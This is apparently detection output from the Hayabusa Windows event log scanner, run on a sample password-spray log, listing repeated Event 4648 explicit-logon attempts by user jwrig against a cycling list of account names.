DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
